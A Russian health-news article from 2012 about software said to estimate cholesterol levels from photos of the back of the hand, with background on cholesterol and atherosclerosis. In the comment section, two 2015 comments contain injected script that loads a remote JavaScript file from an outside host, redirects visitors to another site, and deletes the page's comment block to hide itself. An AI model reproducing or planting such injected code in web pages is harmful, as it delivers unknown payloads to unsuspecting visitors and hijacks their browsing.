Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Уровень холестерина – по ...  >>  Уровень холестерина – по фотографии
 
Обратная связь
 

Уровень холестерина – по фотографии

Размер шрифта
30 августа 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Разработан новый способ определения уровня холестерина – по фотографии тыльной поверхности кисти.

Что такое холестерин

Холестерин – это органическое соединение, которое содержится в клеточных мембранах всех живых организмов. Около 80% холестерина вырабатывается самим организмом (печенью, кишечником, почками, надпочечниками, половыми железами), остальные 20% поступают с пищей.

Холестерин обеспечивает стабильность клеточных мембран; он необходим для выработки витамина D, желчных кислот и стероидных гормонов: кортизола, альдостерона, женских половых гормонов эстрогенов и прогестерона, мужского полового гормона тестостерона. 

Поскольку холестерин нерастворим в воде, то он не может находиться в крови в чистом виде. Транспорт холестерина осуществляется особыми белками-переносчиками. Соединения холестерина с такими белками называются липопротеины. Существуют липопротеины высокой плотности (ЛПВП), низкой плотности (ЛПНП) и очень низкой плотности. 

Холестерин и атеросклероз

Одним из основных факторов риска развития атеросклероза являются нарушения липидного обмена: повышение уровня общего холестерина, холестерина из ЛПНП («плохого» холестерина) и снижение уровня холестерина из ЛПВП («хорошего» холестерина).

Атеросклероз сопровождается отложением на стенках сосудов холестериновых бляшек. Они суживают просвет артерий, что приводит к ухудшению кровоснабжения различных органов и тканей. В результате развивается ишемия, т.е. кислородное голодание. Атеросклеротические бляшки опасны тем, что они могут изъязвляться и приводить к закупорке сосуда. В результате, участок ткани, к которому не поступает кровь, погибает. Так развивается инфаркт миокарда и инсульт.

Суть исследования

Первым шагом индийских ученых на пути к новой разработке стало создание большой базы данных, в которой каждому уровню холестерина, определенному с помощью традиционного метода – анализа крови, соответствует фотография тыльной стороны кисти. Затем ученые создали специальную программу, которая сравнивает фотографию пациента с фотографиями из базы данных и по соответствию той или иной фотографии определяет уровень холестерина.

Поскольку новый метод является неинвазивным и недорогим, то ученые надеются, что с помощью него удастся обследовать значительно больше людей, не прибегая к дорогостоящим анализам крови.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

01 сентября 2012 в 16:56

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 21:31

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:36

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Руками не трогать! Части тела, которых нельзя трогать руками!   Яичный желток опасен для сосудов   Холестерин приводит к раку   Новый механизм контроля ожирения и атеросклероза  
29 августа 2012Уровень холестерина – по фотографии! 09 января 2013Всего одно яблоко в день защитит от атеросклероза
 
07 января 2013ГМО-помидоры спасают от атеросклероза 12 октября 2012Яичный желток опасен для сосудов так же, как курение!
 

Слайдшоу

1
Упражнения для пальцев, чтобы не болели руки
Как сделать руки моложе
Почему ваши ногти все время ломаются?

Тесты

1
Что вы знаете о холестерине?
Заболеет ли ваша семья?
Как быстро вы стареете
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.